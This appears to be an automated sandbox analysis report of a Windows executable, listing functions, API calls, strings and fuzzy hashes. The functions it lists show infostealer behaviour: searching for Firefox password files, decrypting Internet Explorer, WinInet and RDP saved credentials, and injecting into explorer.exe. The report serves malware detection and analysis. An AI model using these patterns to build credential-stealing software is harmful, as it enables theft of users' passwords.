Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: e0fc911766141696de52452919b4824b3bb434a5f5890549219eb4aa70d6853e
Instruction ID: e834c9600f7e1f41c88b418a2028c1d051d4e2a67dccc2874989ccf6031adb31
Opcode Fuzzy Hash: e0fc911766141696de52452919b4824b3bb434a5f5890549219eb4aa70d6853e
Instruction Fuzzy Hash: 4EF0E5323162089BEB104F15DC45B9F3B58E790799F10043BFE01A72C4D3BEDA918358

Function 004030D3 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403118

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: d6d87b1d255557b6a3ce414a09b82a7ba2530fd90c2d245eb8d16836291047cc
Instruction ID: 860f4d7612bd9a785f460a4ed282619bb121214c5a508a6a1dd9894722f68a6a
Opcode Fuzzy Hash: d6d87b1d255557b6a3ce414a09b82a7ba2530fd90c2d245eb8d16836291047cc
Instruction Fuzzy Hash: A2F0307560411CAEDB20CF50CC41BEABB7CEB18328F1042A2E558EA1D0E7F59BD48F95

Function 00403927 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0040393C

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 86f92290934c130aae8d239850853b02c716a860cf956909a831475ea64517db
Instruction ID: 4852e405930d01820976a5792c930ccf955b73523dc535e9c389921a37e96620
Opcode Fuzzy Hash: 86f92290934c130aae8d239850853b02c716a860cf956909a831475ea64517db
Instruction Fuzzy Hash: 19B092316542082AE610A6958C439E6729C9744B0CF4401A52B69D22C2EAE9EAD046EA

Function 00401016 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0040101D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 32b2249c0e5039061dbadc90455b537bea0a25c7daf71954061d8c42792f4c30
Instruction ID: cc5a57047fceea2a8ca6012e4f3b9f734970da0fe3ff9bcb04c274512a565ec7
Opcode Fuzzy Hash: 32b2249c0e5039061dbadc90455b537bea0a25c7daf71954061d8c42792f4c30
Instruction Fuzzy Hash: 45A022323B820030EE00ABC08C03FCCAA030B20B8CF008002B3082C0C2C0FAE0E0C338

Function 004E0000 Relevance: 1.3, APIs: 1, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,0000072C,00001000,00000040), ref: 004E00CD

Memory Dump Source

Source File: 00000000.00000002.2904351309.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_pbfe2Xcxue.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 58531ec5487ff46779e154e5da2004d808305740356bac15d1023e4c08c3c533
Instruction ID: 23be1165357db6c0bc4e23b76a1edd076a9d899792ddd1199eb26d75c1fc3d62
Opcode Fuzzy Hash: 58531ec5487ff46779e154e5da2004d808305740356bac15d1023e4c08c3c533
Instruction Fuzzy Hash: AC31F52510C6C266CB03AB718908A46FF8ABF4731AB1DC6C4E5ED6A953C76DE4A0C790

Function 004018F4 Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00402510,?,?,?,?,?,?), ref: 00401900

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 4aaf6a95b2b4547edd5fc12a07d5fa921451d3b4788a3dcca5d43dd86f83d86d
Instruction ID: 36159a681d5b5c47b03bffa30afd2bf4eab4d9358c60d8a54bac3beee167eddb
Opcode Fuzzy Hash: 4aaf6a95b2b4547edd5fc12a07d5fa921451d3b4788a3dcca5d43dd86f83d86d
Instruction Fuzzy Hash: B0C09B7110060C55D7025E65D90979A79D45B11389F4181356505645B2F7F8D5F0D5D8

Non-executed Functions

Function 00409AF6 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00409B66
lstrcmpiA.KERNEL32(00414900,?), ref: 00409B93
lstrcmpiA.KERNEL32(00414902,?), ref: 00409BB0
FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409D46
FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409D59

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

Strings

*.*, xrefs: 00409B35
signons2.txt, xrefs: 00409CDC
\*.*, xrefs: 00409B26
prefs.js, xrefs: 00409C1F
signons3.txt, xrefs: 00409CED
signons.txt, xrefs: 00409CCB
signons.sqlite, xrefs: 00409C65

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3040542784-1405255088
Opcode ID: 5c77b75c859a3a3c8655eec3dae5a0f926864f1b2f9ff64128f26a67e44dd565
Instruction ID: 2b4c0fda24d83b44dc08ccd6ab7c6b19b71cc99feb65ad9903762619ff66c9a9
Opcode Fuzzy Hash: 5c77b75c859a3a3c8655eec3dae5a0f926864f1b2f9ff64128f26a67e44dd565
Instruction Fuzzy Hash: CF5160B1941209BADF21AF61DD06FEE7769AF50308F1040BBB908710F2D67D9DE09A5D

Function 00402D3E Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

explorer.exe, xrefs: 00402DCD

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: explorer.exe
API String ID: 0-3187896405
Opcode ID: 3ab78f934fcaf868473b84f21beff55e01278a47ee7d2d22a7c1ce598486e9b5
Instruction ID: 245b9f8b9273737babcd6378abc80a44e6c96fdbf52f0b37ee05213faa98bba1
Opcode Fuzzy Hash: 3ab78f934fcaf868473b84f21beff55e01278a47ee7d2d22a7c1ce598486e9b5
Instruction Fuzzy Hash: 71418F72940219ABDF229FA0CD49BEE7A75AF04304F0441B7A504B51E1DBB89ED1DF58

Function 00410686 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 143COMMON

Download Yara Rule

Strings

diamond, xrefs: 00410770, 00410784
, xrefs: 00410798

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID: $diamond
API String ID: 0-3606237843
Opcode ID: c15af7d19d6f95a7f84986e1a1d75180473bdb2ee32f895e676627024aa6a21b
Instruction ID: 2265d41e95d6c3fd5ea7938403a4911ca94aeb945ce9fe3e7a188991b421d247
Opcode Fuzzy Hash: c15af7d19d6f95a7f84986e1a1d75180473bdb2ee32f895e676627024aa6a21b
Instruction Fuzzy Hash: F9516C75A00208EFEF119FA4CD46BDEBA75EB44308F148066E510A91E2D7F98AD0DF68

Function 0040A81B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105stringencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A56D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5A6
Part of subcall function 0040A56D: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A5AF

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A84F
lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A8D9
lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A8F8
lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A917
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A930
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A976
LocalFree.KERNEL32(?), ref: 0040A9A3
CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A9CD

Strings

Internet Explorer, xrefs: 0040A8CD
WininetCacheCredentials, xrefs: 0040A8EC
MS IE FTP Passwords, xrefs: 0040A90B
DPAPI: , xrefs: 0040A924

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 2957877119-3076635702
Opcode ID: 7e51257053c96a58961f265a6878f88c233dc879845eef77a664f47e0f7efbdd
Instruction ID: d0b50bfead2f42566bd9c65e426667afbf0b5bfdd59cdd306150fa7cd1c027c5
Opcode Fuzzy Hash: 7e51257053c96a58961f265a6878f88c233dc879845eef77a664f47e0f7efbdd
Instruction Fuzzy Hash: CA41FB7150021DEADF219F50CC42FDA77B9BF04304F0484A6B684B5090DB799AE5DFD9

Function 0040BEF4 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140stringencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BFAB
LocalFree.KERNEL32(00000000,?), ref: 0040BFE6
lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C027
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C035
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C043
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C051
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C05F
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040C06D

Strings

https://, xrefs: 0040C05A, 0040C065
http://, xrefs: 0040C03E, 0040C049
ftp://, xrefs: 0040C022, 0040C02D

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotect
String ID: ftp://$http://$https://
API String ID: 3968356742-2804853444
Opcode ID: 7e1870fcc2b2c2654e989bb7a4941a9d8bc32d277c570f3d10b05c9e10ea6460
Instruction ID: 926805cedc70b954b79b01b1a7ecc7b4b4811d3c67d73157f2bf5b5d26860602
Opcode Fuzzy Hash: 7e1870fcc2b2c2654e989bb7a4941a9d8bc32d277c570f3d10b05c9e10ea6460
Instruction Fuzzy Hash: F0510732910209FBCF11ABD1DC81EEE7B7AEF48305F14813AF511B21A1DB799A91DB58

Function 00408C29 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00408C99
lstrcmpiA.KERNEL32(00414900,?), ref: 00408CC2
lstrcmpiA.KERNEL32(00414902,?), ref: 00408CDF
FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 00408D86
FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 00408D99

Part of subcall function 00401E34: lstrlenA.KERNEL32(?), ref: 00401E55
Part of subcall function 00401E34: lstrlenA.KERNEL32(00000000,?), ref: 00401E5F
Part of subcall function 00401E34: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401E73
Part of subcall function 00401E34: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401E7C

Strings

*.*, xrefs: 00408C68
\*.*, xrefs: 00408C59

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 5e419986c46963edbd489a6238c02946ee884d372549de3b54a9c74f0383bbfc
Instruction ID: d9b658f99edcf380480679d0380fbda1e3de7f606a045d53a7d20716763285dc
Opcode Fuzzy Hash: 5e419986c46963edbd489a6238c02946ee884d372549de3b54a9c74f0383bbfc
Instruction Fuzzy Hash: 80314FB1501209BADF11AB21CD02FEE7779AF20308F1441BBB95CB50F1DA7D8E909B59

Function 0040D0FB Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 0040D1A0
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040D206
LocalFree.KERNEL32(00000000), ref: 0040D22D

Strings

full address:s:, xrefs: 0040D172
username:s:, xrefs: 0040D14C
password 51:b:, xrefs: 0040D15F

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 2920030623-2945746679
Opcode ID: f8c0bd1dde0fd01f25be36c8954f39aa40b6f21269f9b9dc6824445267d337d6
Instruction ID: 521d8c06d8872df347c5d21da1874a82d467e8718c9d5b1a6a76fae600a3ffa9
Opcode Fuzzy Hash: f8c0bd1dde0fd01f25be36c8954f39aa40b6f21269f9b9dc6824445267d337d6
Instruction Fuzzy Hash: 7F414632C00209EADF119BE1DC06BEEBB75AF48318F14403BE200751E1DB794A9ADB5D

Function 0040AC2F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88stringencryptionCOMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040ACA1
lstrlenW.KERNEL32(00415D0E,?,?,00000000), ref: 0040ACDF
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040AD0F
LocalFree.KERNEL32(00000000), ref: 0040AD41
CredFree.ADVAPI32(00000000), ref: 0040AD5F

Strings

Microsoft_WinInet_*, xrefs: 0040AC9C

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
String ID: Microsoft_WinInet_*
API String ID: 3891647360-439986189
Opcode ID: 80a2e83370bb61d3e19e57fd98beae2e73b7afe73c6cb1f283b32fdf871d3c92
Instruction ID: 5a812cee58d32793c44ab0004d8813f03de0939113520eef2f9af034efdbf5f1
Opcode Fuzzy Hash: 80a2e83370bb61d3e19e57fd98beae2e73b7afe73c6cb1f283b32fdf871d3c92
Instruction Fuzzy Hash: 32311B72900308EFEF218B90ED09BEEB6B5AF44305F148036E511766D0D7B89AD4CB5A

Function 00402EE2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00000000,00000044,?), ref: 00402F74
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,0000000A), ref: 00402FA1

Strings

D, xrefs: 00402F33
open, xrefs: 00402F9A

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CreateExecuteProcessShellUser
String ID: D$open
API String ID: 1679197209-2491301029
Opcode ID: 91e888894ed81a06755e49cf0cbee73dd2f00fa8b12ff89b241d646b47462b6b
Instruction ID: 65e519f15533edacccbcc2ab68badd36ae88e9590d8298b26916f8c6ed4c30e5
Opcode Fuzzy Hash: 91e888894ed81a06755e49cf0cbee73dd2f00fa8b12ff89b241d646b47462b6b
Instruction Fuzzy Hash: 8A211D7164020ABADF218B90DE0AFDE7778AB04748F248033B645B90E4D6FC9584EA1D

Function 0040ADE6 Relevance: 4.6, APIs: 3, Instructions: 121stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0040ADFB
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AEB3
LocalFree.KERNEL32(00000000), ref: 0040AEE6

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID:
API String ID: 2920030623-0
Opcode ID: 78f9f08e1e700f00362d5cadeb092079dea6affe507255d9df67910bbce9b11d
Instruction ID: 7f55c2bfa634a7279b01034aebd702cef864f94d93bc03b295f81b45b5ad80e3
Opcode Fuzzy Hash: 78f9f08e1e700f00362d5cadeb092079dea6affe507255d9df67910bbce9b11d
Instruction Fuzzy Hash: 7D31D8776802049BEF209E54D844BCEB765FB95364F104033DA55B76C0D37C9A92CB9E

Function 00404752 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004047B1
CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 004047CD
FreeSid.ADVAPI32(?), ref: 004047E1

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 157f16b5c99da2e5783f292e44723cf0196ef30e0fdd4ace4729c8b1f3548b16
Instruction ID: abac0aabba2ae30627f2129dd6e041b3ede074dbb1d9b92be2e54af79a61d022
Opcode Fuzzy Hash: 157f16b5c99da2e5783f292e44723cf0196ef30e0fdd4ace4729c8b1f3548b16
Instruction Fuzzy Hash: 6E114475500248EEEB21CB94DC0DFDA7BF4AB51308F0981B5E210AB2E1D3B99504C79A

Function 0040465C Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004046A8
LocalFree.KERNEL32(00000000), ref: 004046DC

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 5e4ebc9361cf310c78c26b4b80c41da4300d9c464cd2556beeb3ffdc08145257
Instruction ID: 318e217419bb7282489a1e580f81bcf2f6dc81518ad431105c03e2b5713db43c
Opcode Fuzzy Hash: 5e4ebc9361cf310c78c26b4b80c41da4300d9c464cd2556beeb3ffdc08145257
Instruction Fuzzy Hash: 13115875A00208EFDF11CF84DC44BDEBBB5FB86314F008466FA11A62D0D379AAA0DB08

Function 004039CE Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
Instruction ID: 04253af852c3278be08785016eb7e3b26d9b4c395a195d52766f27199939e121
Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
Instruction Fuzzy Hash: 3F121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648

Function 0041256A Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2904230646.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2904213316.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_pbfe2Xcxue.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f70be72155e2526db8c1e7dbc10a3005bf4209f57955f8871c74e262be628f48
Instruction ID: ce438fbf563cf6f26a374f6d561d24e4a1be7fc4629f7ef1e808023105cd1412
Opcode Fuzzy Hash: f70be72155e2526db8c1e7dbc10a3005bf4209f57955f8871c74e262be628f48
Instruction Fuzzy Hash: 4861B337F5163647E7588DAA8881155E6D2ABCC320B5F827ECD19F7381CDB4BD2296C0

Function 004E00EB Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2904351309.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_pbfe2Xcxue.jbxd

Similarity

API ID:
String ID:
API String ID:
